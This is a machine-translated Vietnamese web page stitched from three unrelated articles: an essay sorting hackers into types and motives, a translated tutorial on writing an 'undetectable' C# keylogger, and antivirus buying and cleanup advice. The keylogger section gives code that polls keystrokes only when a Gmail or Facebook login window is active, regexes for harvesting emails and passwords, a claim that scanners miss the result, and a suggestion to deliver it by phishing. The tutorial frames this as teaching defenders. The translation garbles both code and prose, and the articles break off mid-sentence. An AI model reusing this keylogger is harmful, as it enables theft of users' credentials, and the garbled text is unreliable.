Đã đến lúc nói về người viết và tung ra tất cả những thứ vớ vẩn này trên Internet. Ở đây tôi sẽ cố gắng phân loại những nhóm người đang tham gia vào công việc kinh doanh không phù hợp này. Chúng ta sẽ không nói về những hacker “mũ trắng” ở đây. Tôi sẽ giải thích tại sao. Sự đa dạng này không gây nguy hiểm cho xã hội và mang lại lợi ích cho nó. Họ là những người thường xuyên viết virus chống vi-rút nhất để vô hiệu hóa những cá nhân đặc biệt có hại. Tại sao virus? Các chương trình này lây lan bằng cơ chế tương tự như virus. Tại sao lại chống? Bởi vì chúng chặn hoặc loại bỏ một loại virus nào đó khỏi máy tính. Điểm khác biệt chính của chúng so với virus là khả năng tự hủy sau khi hoàn thành nhiệm vụ và không có bất kỳ chức năng phá hoại nào. Một ví dụ là một loại virus tương tự xuất hiện trên Internet một thời gian sau khi Lovesan tái nghiện. Sau khi tải virus diệt virus xuống, Lovesan đã bị gỡ bỏ và người dùng được yêu cầu tải xuống các bản cập nhật cho Windows. Các hacker mũ trắng cũng tìm ra lỗ hổng trong phần mềm và hệ thống máy tính. sau đó báo cáo đã tìm thấy lỗi cho các công ty. Bây giờ hãy chuyển thẳng đến phân loại của chúng tôi.

Loại một: “con của tập lệnh”. Tên của họ không ai khác chính là 37717 (00|_ HaCkeR-rr, họ đọc tạp chí Hacker, không biết một ngôn ngữ lập trình nào và họ tạo ra tất cả Trojan và virus “của mình” bằng cách tải xuống các chương trình làm sẵn từ Internet. ( Để tránh các cuộc tấn công, tôi sẽ đặt trước: về nguyên tắc, tạp chí “Hacker” không tệ và tài liệu trong đó được trình bày ở dạng khá đơn giản - ở một số chỗ, điều đó đúng, nhưng ở dạng đơn giản đối với những người đã có một số kiến ​​​​thức và họ cung cấp tài liệu một cách khôn ngoan - họ không kể hết mọi thứ - để không thu hút họ ở đâu cả, bạn phải suy nghĩ.) Những "hacker" này thường sau khi họ gửi cho ai đó một email. Trojan được tải xuống từ đâu đó và cái sau hoạt động, họ ngay lập tức bắt đầu la hét trên các diễn đàn về việc chúng tuyệt vời như thế nào, v.v., v.v. Vì họ nhận được một loạt các tuyên bố không hay ho, vì đây không phải là trường hợp nên tốt hơn là nên giữ lại im lặng, đơn giản là họ không có đủ kinh nghiệm hoặc (trong một số trường hợp) bộ não.

Loại thứ hai: "người mới bắt đầu". Loài này là hậu duệ trực tiếp của loài đầu tiên. Một số đại diện của loại đầu tiên, sau một thời gian nhất định, bắt đầu hiểu rằng họ không ngầu như họ nghĩ, rằng hóa ra có một số ngôn ngữ lập trình, bạn có thể làm gì đó và sau đó không hét lên với cả thế giới về việc tôi là một chàng trai tuyệt vời như thế nào. Một số người trong số họ trong tương lai có lẽ sẽ trở thành đại diện của tầng lớp chuyên nghiệp. Những người này bắt đầu học một ngôn ngữ, cố gắng viết một cái gì đó và tư duy sáng tạo bắt đầu thức tỉnh trong họ. Và đồng thời, chúng bắt đầu gây ra một mối nguy hiểm nhất định cho xã hội, bởi vì ai biết được tác phẩm đáng sợ nào mà một đại diện của tầng lớp những người viết virus có thể viết ra do thiếu kinh nghiệm. Suy cho cùng, khi một người viết mã chuyên nghiệp, anh ta vẫn nhận ra rằng có một số việc không cần phải làm, bởi vì... họ có thể chơi với anh ta. Người mới bắt đầu không có kiến ​​thức như vậy và điều này khiến anh ta trở nên nguy hiểm.

Loại thứ ba: “chuyên nghiệp”. Họ phát triển từ loại thứ hai. “Ưu điểm” nổi bật ở chỗ có kiến ​​thức sâu về ngôn ngữ lập trình, an ninh mạng, hiểu sâu về hệ điều hành và quan trọng nhất là có kiến ​​thức và hiểu biết rất nghiêm túc về cơ chế hoạt động của mạng và hệ thống máy tính. Hơn nữa, các “pro” không chỉ tìm hiểu về những lỗ hổng trong hệ thống bảo mật từ các bản tin của công ty mà còn có thể tự mình tìm ra chúng. Họ thường tham gia cùng nhau trong các nhóm hacker để nâng cao chất lượng “công việc” của mình. Những người này hầu hết là người kín đáo và không tham lam danh tiếng; khi thực hiện một hoạt động thành công nào đó, họ không chạy đi nói cho cả thế giới biết về điều đó mà thích ăn mừng thành công một cách hòa bình giữa bạn bè. Tất nhiên, họ gây ra mối nguy hiểm lớn, nhưng vì họ đều là những người hiểu biết nên họ sẽ không thực hiện những hành động có thể gây ra sự sụp đổ toàn cầu của bất kỳ hệ thống nào - ví dụ như Internet. Mặc dù vẫn có những trường hợp ngoại lệ (không phải ai cũng quên Slammer).

Loại thứ tư: "tin tặc công nghiệp". Những đại diện nguy hiểm nhất của gia đình hacker đối với xã hội. Họ có thể được gọi một cách chính đáng là tội phạm thực sự. Họ chịu trách nhiệm viết hầu hết các trình quay số và hack mạng của các ngân hàng, công ty lớn và cơ quan chính phủ. Tại sao và tại sao họ làm điều này, chúng ta sẽ nói dưới đây. “Các nhà công nghiệp” không quan tâm đến bất cứ điều gì hoặc bất kỳ ai; những cá nhân này có khả năng làm bất cứ điều gì để đạt được mục tiêu của họ.

Bây giờ hãy tóm tắt những gì đã được viết. “Những đứa con của chữ viết”: trẻ, non nớt và thiếu kinh nghiệm. Tôi muốn chứng tỏ rằng bạn là người tuyệt vời nhất và người tuyệt vời nhất hơn bạn là Cool Sam.
“Người mới bắt đầu”: Tôi có mong muốn tự mình viết một cái gì đó. May mắn thay, một số người trong số họ sau khi cố gắng nắm vững sự phức tạp của các giao thức Internet và ngôn ngữ lập trình đã từ bỏ và đi làm điều gì đó yên bình hơn.
“Pro”: nếu đột nhiên xảy ra trạng thái “nhận ra tội lỗi, mức độ, mức độ, chiều sâu” của mình, thì người đại diện thuộc loại này sẽ trở thành một chuyên gia bảo mật máy tính có trình độ cao. Tôi ước có nhiều chuyên gia hơn sẽ đạt được điểm này.
“Các nhà công nghiệp”: không có gì thiêng liêng cả. Sự khôn ngoan phổ biến nói tốt về những người như vậy: “Ngôi mộ sẽ sửa chữa gù lưng”.
Đây là sự phân chia sơ bộ thành các loại đại diện của lớp kẻ tấn công máy tính. Bây giờ hãy chuyển sang câu hỏi tại sao họ làm điều này.

Để làm gì
Nhưng thực sự, tại sao virus, Trojan, trình quay số và các linh hồn ma quỷ khác lại được viết ra? Một trong những lý do là mong muốn khẳng định bản thân. Nó là điển hình cho đại diện của loại thứ nhất và thứ hai. Một người chỉ cần cho bạn bè thấy rằng anh ta là “một người như thế, một đứa trẻ thực sự, ngầu”, người còn lại - chủ yếu là để nâng cao lòng tự trọng. Lý do thứ hai là để tích lũy kinh nghiệm. Điển hình cho người mới bắt đầu. Sau khi viết kiệt tác đầu tiên của mình, đương nhiên bạn muốn thử nghiệm nó với ai đó. Thực sự không phải về bản thân bạn. Vì vậy, một số lượng nhất định các loại virus mới, không phải lúc nào cũng rất nguy hiểm, xuất hiện trên Internet. Lý do tiếp theo là tinh thần cạnh tranh. Bạn đã bao giờ nghe nói về các cuộc thi hacker chưa? Lần cuối cùng tôi biết diễn ra vào mùa hè. Nhóm hacker Brazil đã giành chiến thắng (hóa ra họ không chỉ mạnh về bóng đá). Nhiệm vụ như sau: ai sẽ phá vỡ nhiều trang web nhất. Nhưng tôi chắc chắn rằng sẽ có những cuộc cạnh tranh dành cho cả loại virus phức tạp nhất và keylogger giỏi nhất. Adrenaline là một lý do khác. Hãy tưởng tượng: màn đêm, đèn màn hình, ngón tay lướt trên bàn phím, ngày hôm qua đã tìm thấy lỗ hổng trong hệ thống bảo mật, hôm nay bạn cần cố gắng giành quyền truy cập vào hệ thống và cho quản trị viên đồng nghiệp của bạn biết ai là ông chủ. Tiếp theo lý do này là lý do tiếp theo - sự lãng mạn. Vì vậy, một số người thích ngắm hoàng hôn, một số thích ngắm các vì sao, và một số thích viết virus và làm xấu trang web. Bao nhiêu người, bao nhiêu sở thích. Lý do là như sau - phản đối chính trị hoặc xã hội. Vì lý do này, hầu hết các trang web của chính phủ, trang web của đảng chính trị, các ấn phẩm in ấn và trực tuyến, cũng như các tập đoàn lớn đều bị tấn công. Bạn không cần phải tìm đâu xa để tìm ví dụ. Ngay sau khi bắt đầu cuộc chiến ở Iraq, các cuộc tấn công đã được thực hiện trên các trang web của chính phủ Mỹ bởi những người không hài lòng với chính sách của Bush, cũng như trang web của tờ báo Ả Rập Al-Jazeera và một số nguồn tin Ả Rập khác từ phía đối diện. Và có lẽ lý do cuối cùng là sự phổ biến của tiền bạc. Có thể nói, chính vì lợi ích của họ mà các hacker công nghiệp chủ yếu hoạt động. Bằng cách xâm nhập vào mạng ngân hàng, họ có quyền truy cập vào tài khoản của khách hàng. Không khó để đoán điều gì sẽ xảy ra tiếp theo. Bằng cách thu thập thông tin về bất kỳ người dùng Internet nào thông qua phần mềm gián điệp, sau đó họ tham gia vào các hoạt động tống tiền tầm thường. Những hành động mà các “nhà công nghiệp” thực hiện có thể liệt kê rất dài, tôi chỉ muốn nói một lần nữa rằng họ chính thức là tội phạm máy tính và họ cần phải bị đối xử như tội phạm.

Để tránh những bức thư giận dữ gửi đến bạn về chủ đề: “Có phải những người khác tốt bụng và dễ mến đến mức bạn bảo vệ họ nhiều như vậy không?”, tôi sẽ nói như sau. Tôi không có ý định bảo vệ bất kỳ ai, và không ai trong số bốn loài được mô tả là thiên thần bằng xương bằng thịt - tất cả họ đều mang trong mình một tội ác nhất định. Nhưng tin tặc định kỳ cho chúng ta biết rằng không phải mọi thứ trên thế giới này đều hoàn hảo. Tôi sẽ cho bạn một ví dụ. Virus Slammer, loại virus tạm thời làm tê liệt Internet, đã khai thác một lỗi mà Microsoft đã phát hiện và vá ba tháng trước đó. Nhưng cần nhớ rằng ví dụ được đưa ra là một ngoại lệ. Vì vậy, cần phải tuân thủ ít nhất những điều cơ bản về bảo mật máy tính.

Andrey Radzevich
Bài viết sử dụng tư liệu từ Great Virus Encyclopedia, viruslist.com

Ngày 2 tháng 6 năm 2016 lúc 12:29 chiều

Chúng tôi viết phần mềm độc hại của riêng mình. Phần 1: Học cách viết keylogger hoàn toàn “không thể bị phát hiện”

  • Blog hệ thống Varonis,
  • Bảo mật thông tin ,
  • Lập trình
  • Dịch
  • Chế độ phục hồi

Thế giới hacker có thể được chia thành ba nhóm kẻ tấn công:


1) “Skids” (script kiddies) – những hacker mới vào nghề thu thập các đoạn mã và tiện ích nổi tiếng rồi sử dụng chúng để tạo ra một số phần mềm độc hại đơn giản.


2) “Người mua” là những doanh nhân vô đạo đức, thanh thiếu niên và những người thích cảm giác mạnh khác. Họ mua dịch vụ viết phần mềm như vậy trên Internet, thu thập nhiều thông tin cá nhân khác nhau với sự trợ giúp của nó và có thể bán lại nó.


3) “Black Hat Coders” - các chuyên gia lập trình và kiến ​​trúc. Họ viết mã vào sổ ghi chú và phát triển các cách khai thác mới từ đầu.


Liệu người có kỹ năng lập trình tốt có thể trở thành người cuối cùng? Tôi không nghĩ bạn sẽ bắt đầu tạo thứ gì đó như regin (liên kết) sau khi tham dự một vài phiên DEFCON. Mặt khác, tôi tin rằng nhân viên an ninh thông tin nên nắm vững một số khái niệm về cách tạo ra phần mềm độc hại.


Tại sao nhân viên an ninh thông tin lại cần những kỹ năng đáng ngờ này?


Biết kẻ thù của bạn. Như chúng ta đã thảo luận trên blog Inside Out, bạn cần suy nghĩ như người phạm tội để ngăn chặn anh ta. Tôi là chuyên gia bảo mật thông tin tại Varonis và theo kinh nghiệm của tôi, bạn sẽ mạnh mẽ hơn trong lĩnh vực này nếu bạn hiểu những động thái mà kẻ tấn công sẽ thực hiện. Vì vậy, tôi quyết định bắt đầu một loạt bài viết về các chi tiết đằng sau phần mềm độc hại và các nhóm công cụ hack khác nhau. Khi bạn nhận ra việc tạo phần mềm không thể bị phát hiện dễ dàng như thế nào, bạn có thể muốn xem xét lại các chính sách bảo mật của doanh nghiệp mình. Bây giờ chi tiết hơn.


Đối với lớp "hack 101" không chính thức này, bạn cần có một số kiến ​​thức lập trình (C# và java) và hiểu biết cơ bản về kiến ​​trúc Windows. Hãy nhớ rằng trên thực tế, phần mềm độc hại được viết bằng C/C++/Delphi để không phụ thuộc vào khung.


Keylogger


Keylogger là phần mềm hay gì đó thiết bị vật lý, có thể chặn và ghi nhớ các lần nhấn phím trên máy bị xâm nhập. Đây có thể được coi là một cái bẫy kỹ thuật số đối với mỗi lần gõ phím trên bàn phím.
Thông thường, chức năng này được triển khai trong phần mềm khác phức tạp hơn, chẳng hạn như Trojan (Trojan truy cập từ xa RATS), đảm bảo gửi lại dữ liệu bị chặn cho kẻ tấn công. Ngoài ra còn có keylogger phần cứng, nhưng chúng ít phổ biến hơn vì... yêu cầu ngay lập tức Truy cập vật lý tới ô tô.


Tuy nhiên, tạo chức năng cơ bản Keylogger khá dễ lập trình. CẢNH BÁO. Nếu bạn muốn thử bất kỳ thao tác nào sau đây, hãy đảm bảo rằng bạn có quyền và không làm gián đoạn môi trường hiện có, đồng thời tốt nhất bạn nên thực hiện tất cả trên một máy ảo bị cô lập. Hơn nữa, mã này sẽ không được tối ưu hóa, tôi sẽ chỉ cho bạn thấy những dòng mã có thể hoàn thành nhiệm vụ, đó không phải là cách tao nhã hay tối ưu nhất. Và cuối cùng, tôi sẽ không cho bạn biết cách làm cho keylogger có khả năng chống khởi động lại hoặc cố gắng làm cho nó hoàn toàn không bị phát hiện bằng các kỹ thuật lập trình đặc biệt, cũng như bảo vệ khỏi bị xóa ngay cả khi nó bị phát hiện.



Để kết nối với bàn phím bạn chỉ cần sử dụng 2 dòng trong C#:


1. 2. 3. public static extern int GetAsyncKeyState(Int32 i);

Bạn có thể tìm hiểu thêm về hàm GetAsyncKeyState trên MSDN:


Để hiểu: chức năng này xác định xem một phím được nhấn hay nhả tại thời điểm gọi và liệu nó có được nhấn sau cuộc gọi trước hay không. Bây giờ chúng ta liên tục gọi hàm này để nhận dữ liệu từ bàn phím:


1. while (true) 2. ( 3. Thread.Sleep(100); 4. for (Int32 i = 0; i< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

Những gì đang xảy ra ở đây? Vòng lặp này sẽ thăm dò từng khóa cứ sau 100 mili giây để xác định trạng thái của nó. Nếu một trong số chúng được nhấn (hoặc đã được nhấn), một thông báo về điều này sẽ được hiển thị trên bảng điều khiển. TRONG đời thực dữ liệu này được đệm và gửi cho kẻ tấn công.


Keylogger thông minh

Đợi đã, có ích gì khi cố gắng xóa tất cả thông tin khỏi tất cả các ứng dụng không?
Đoạn mã trên lấy đầu vào bàn phím thô từ bất kỳ cửa sổ và trường đầu vào nào hiện có tiêu điểm. Nếu mục tiêu của bạn là số thẻ tín dụng và mật khẩu thì cách tiếp cận này không hiệu quả lắm. Đối với các tình huống trong thế giới thực, khi các keylogger như vậy được thực thi trên hàng trăm hoặc hàng nghìn máy, việc phân tích dữ liệu tiếp theo có thể trở nên rất dài và cuối cùng là vô nghĩa, bởi vì Thông tin có giá trị đối với kẻ tấn công có thể đã lỗi thời vào thời điểm đó.


Giả sử rằng tôi muốn có được thông tin đăng nhập Facebook hoặc Gmail để bán lượt thích. Sau đó, một ý tưởng mới là chỉ kích hoạt keylogging khi cửa sổ trình duyệt đang hoạt động và có từ Gmail hoặc facebook ở tiêu đề trang. Bằng cách sử dụng phương pháp này, tôi tăng cơ hội nhận được thông tin xác thực.


Phiên bản thứ hai của mã:


1. while (true) 2. ( 3. IntPtr Handle = GetForegroundWindow(); 4. if (GetWindowText(handle, buff, chars) > 0) 5. ( 6. string line = buff.ToString(); 7. if (line.Contains("Gmail")|| line.Contains("Facebook - Đăng nhập hoặc Đăng ký")) 8. ( 9. //kiểm tra bàn phím 10. ) 11. ) 12. Thread.Sleep(100); 13.)

Đoạn này sẽ tiết lộ cửa sổ đang hoạt động cứ sau 100ms. Việc này được thực hiện bằng hàm GetForegroundWindow ( thêm thông tin trên MSDN). Tiêu đề trang được lưu trong biến buff, nếu nó chứa gmail hoặc facebook thì đoạn quét bàn phím sẽ được gọi.


Bằng cách này, chúng tôi đảm bảo rằng bàn phím chỉ được quét khi cửa sổ trình duyệt mở trên trang facebook và gmail.


Keylogger thậm chí còn thông minh hơn


Giả sử rằng kẻ tấn công có thể lấy được dữ liệu bằng mã tương tự như mã của chúng tôi. Hãy giả sử rằng anh ta có đủ tham vọng để lây nhiễm hàng chục hoặc hàng trăm nghìn máy. Kết quả: một tệp lớn chứa hàng gigabyte văn bản, trong đó thông tin cần thiết vẫn cần được tìm thấy. Đã đến lúc làm quen với biểu thức chính quy hoặc biểu thức chính quy. Đây giống như một ngôn ngữ nhỏ để tạo các mẫu nhất định và quét văn bản để tuân thủ các mẫu nhất định. Bạn có thể tìm thấy nhiều hơn ở đây.


Để đơn giản hóa, tôi sẽ đưa ra ngay các biểu thức làm sẵn tương ứng với tên đăng nhập và mật khẩu:


1. //Tìm kiếm địa chỉ bưu điện 2. ^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* + \-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) ( 3)(1,3)))$ 3. 4. 5. //Tìm mật khẩu 6. (?=^.(6,)$)(?=.*\d)(?=.*)

Những biểu thức này ở đây như một gợi ý về những gì có thể được thực hiện bằng cách sử dụng chúng. Bằng cách sử dụng biểu thức chính quy, bạn có thể tìm kiếm (và tìm thấy!) bất kỳ cấu trúc nào có định dạng cụ thể và không thay đổi, ví dụ: số hộ chiếu, thẻ tín dụng, tài khoản và thậm chí cả mật khẩu.
Thật sự, biểu thức chính quy không phải là loại mã dễ đọc nhất, nhưng chúng là một trong những người bạn tốt nhất của lập trình viên nếu có các tác vụ phân tích cú pháp văn bản. Java, C#, JavaScript và các ngôn ngữ phổ biến khác đã có sẵn các hàm để bạn có thể chuyển các biểu thức chính quy thông thường vào.


Đối với C# nó trông như thế này:


1. Regex re = new Regex(@"^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* +\-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) (3)(1,3)))$"); 2. Regex re2 = new Regex(@"(?=^.(6,)$)(?=.*\d)(?=.*)"); 3. chuỗi email = " [email được bảo vệ]"; 4. chuỗi pass = "abcde3FG"; 5. Kết quả trận đấu = re.Match(email); 6. Kết quả trận đấu2 = re2.Match(pass);

Trong đó biểu thức đầu tiên (re) sẽ khớp với bất kỳ email nào và biểu thức thứ hai (re2) sẽ khớp với bất kỳ cấu trúc chữ và số nào lớn hơn 6 ký tự.


Miễn phí và hoàn toàn không thể phát hiện


Trong ví dụ của tôi, tôi đã sử dụng Visual Studio– bạn có thể sử dụng môi trường yêu thích của mình – ​​để tạo một keylogger như vậy trong 30 phút.
Nếu tôi là kẻ tấn công thực sự, thì tôi sẽ nhắm vào một số mục tiêu thực sự (trang web ngân hàng, mạng xã hội, v.v.) và sửa đổi mã để phù hợp với các mục tiêu này. Tất nhiên, tôi cũng sẽ khởi động một chiến dịch lừa đảo với bằng email với chương trình của chúng tôi, dưới hình thức tài khoản thông thường hoặc khoản đầu tư khác.


Vẫn còn một câu hỏi: liệu phần mềm như vậy có thực sự không bị các chương trình bảo mật phát hiện được không?


Tôi đã biên dịch mã của mình và kiểm tra tệp exe trên trang web Virustotal. Đây là một công cụ web tính toán hàm băm của tệp bạn đã tải lên và tra cứu nó trong cơ sở dữ liệu virus đã biết. Sự ngạc nhiên! Đương nhiên không có gì được tìm thấy.



Đây là điểm chính! Bạn luôn có thể thay đổi mã và phát triển, luôn đi trước các máy quét mối đe dọa vài bước. Nếu bạn có thể viết mã của riêng mình thì gần như được đảm bảo là không thể bị phát hiện. Trong này

  • Bảo mật thông tin
    • Thêm thẻ

    Để phát hiện dấu hiệu hoạt động gián điệp của phần mềm độc hại, hãy lắng nghe cảm xúc cá nhân của bạn. Nếu bạn cảm thấy máy tính của mình chạy chậm hơn nhiều hoặc kết nối Internet của bạn không còn nhanh như bình thường thì đây là những triệu chứng đầu tiên cần được điều tra thêm.

    Nhân tiện, không phải mọi phần mềm chống vi-rút đều nhận ra mối nguy hiểm một cách đáng tin cậy. Tổng quan về các hệ thống tốt nhất có thể được tìm thấy trong bảng dưới đây. Bạn sẽ phải trả từ 800 đến 1800 rúp cho chúng, nhưng chúng sẽ bảo vệ bạn tương đối tốt khỏi các cuộc tấn công. Đồng thời, bạn không nên sợ bị giảm hiệu suất do sử dụng phần mềm chống vi-rút. Phiên bản hiện đại hầu như không ảnh hưởng tới tốc độ của máy tính.

    Tội phạm mạng đang phát tán 100 loại virus mới mỗi giờ. Máy tính để bàn là mục tiêu chính của phần mềm gián điệp. Dịch hại chỉ có thể được phát hiện khi đưa ra lựa chọn đúng đắn tiện ích Chỉ một số chương trình có thể bảo vệ máy tính của bạn khỏi phần mềm gián điệp một cách đáng tin cậy. Dưới đây là những người dẫn đầu thị trường.

    giá, chà. (ĐƯỢC RỒI.) Đánh giá tổng thể Sự công nhận SAI
    sự lo lắng         		Hiệu suất
    1 Kaspersky bảo mật mạng cho tất cả các thiết bị 1800 99,9 99,7 100 100
    2 Bảo mật Internet BitDefender 1600 97,5 100 96,3 93,6
    3 Tiêu chuẩn bảo mật Symantec Norton 1300 96,9 98,1 96,7 94,7
    4 Bảo mật Internet Trend Micro 800 94,3 90,8 98 97,5
    5 F-Secure AN TOÀN 1800 83,6 84,5 82,5 83

    Sử dụng nhiều máy quét song song

    Phần mềm gián điệp tự đào sâu vào hệ thống dưới vỏ bọc của một dịch vụ hoặc trong chương trình cá nhân. Một số loại virus đặc biệt có nguồn gốc sâu có thể ẩn náu ngay cả trước các công cụ bảo mật hiện đại. Trong những năm gần đây, các chuyên gia bảo mật thông tin liên tục phát hiện ra các lỗ hổng trong hệ thống diệt virus: chỉ gần đây mới có chuyên gia Tavis Ormandy làm việc tại bộ phận Dự án Zero Tập đoàn Google, tiết lộ lỗ hổng sâu trong sản phẩm Symantec.

    Đặc biệt, hắn lợi dụng việc Symantec có quyền giải nén mã bên trong nhân Windows. Bằng cách sử dụng kỹ thuật tràn bộ đệm, kỹ sư đã có thể thực hiện mã độc với quyền kernel và do đó bỏ qua tính năng bảo vệ chống vi-rút - và đây chỉ là một ví dụ.

    Vì vậy, điều rất quan trọng là phải kiểm tra một số tiện ích. Để bảo mật hơn, hãy sử dụng chương trình Công cụ quét phục hồi Farbar, giúp lưu nhật ký của các dịch vụ đang chạy.

    Khởi chạy tiện ích và nhấp vào “Quét”. Sau khi quá trình hoàn tất, bạn sẽ tìm thấy nhật ký có tên “frst.txt” trong thư mục chương trình. Mở tệp này và đi đến phần "Dịch vụ". Tại đây, hãy tìm những tên chỉ ra phần mềm gián điệp, chẳng hạn như “SpyHunter”. Nếu bạn không chắc chắn về bất kỳ điều nào trong số đó, hãy kiểm tra tìm kiếm của Google.

    Nếu phát hiện khách không mời, hãy chạy chương trình SpyBot Tìm kiếm & Tiêu diệt và quét hệ thống. Sau đó, chạy lại Công cụ Farbar. Do đó, nếu bạn không còn thấy dịch vụ đáng ngờ nữa thì vi-rút đã bị loại bỏ. Nếu SpyBot không phát hiện được gì, hãy sử dụng máy quét từ Malwarebytes hoặc Máy quét trực tuyến ESET.

    Hướng dẫn bảo vệ

    Quét PC của bạn bằng Farbar (1). Tiện ích này sẽ hiển thị tất cả dịch vụ đang hoạt động trong nhật ký. Nếu không tìm thấy gì đáng ngờ, hãy kiểm tra hệ thống chương trình ESET Máy quét trực tuyến (2). Hầu hết virus quỷ quyệt chỉ có thể được loại bỏ bằng giải pháp Đĩa cứu hộ từ Phòng thí nghiệm Kaspersky (3).

    Các chương trình đặc biệt để hỗ trợ trong các tình huống khẩn cấp

    Ngay cả khi thực hiện nhiều cuộc kiểm tra khác nhau, cần lưu ý rằng có những loại vi-rút đặc biệt nguy hiểm, chẳng hạn như rootkit, ẩn sâu trong hệ thống đến mức việc quét bằng Farbar và các chương trình khác không thể phát hiện ra chúng.

    Vì vậy, cuối cùng, hãy luôn kiểm tra hệ thống bằng công cụ Đĩa cứu hộ Kaspersky. Anh ấy là hệ thống Linux, chạy riêng biệt với Windows và quét PC của bạn dựa trên dấu hiệu vi-rút hiện đại. Nhờ nó, bạn sẽ phát hiện được ngay cả những phần mềm độc hại phức tạp nhất và dọn sạch phần mềm gián điệp trên máy tính của mình.

    Để chặn các chương trình đánh hơi trong tương lai, bạn phải sử dụng phiên bản phần mềm chống vi-rút mới nhất và cài đặt tất cả các khóa cập nhật hệ thống. Để cung cấp từ nhà phát triển bên thứ ba không được cập nhật tự động luôn được cập nhật, vui lòng tham khảo gói chống vi-rút toàn diện Phần mềm diệt virus Kaspersky(giấy phép cho hai thiết bị có giá 1.800 rúp). Nó cũng sẽ cung cấp bảo vệ chống gián điệp.

    Hình chụp: Công ty gia công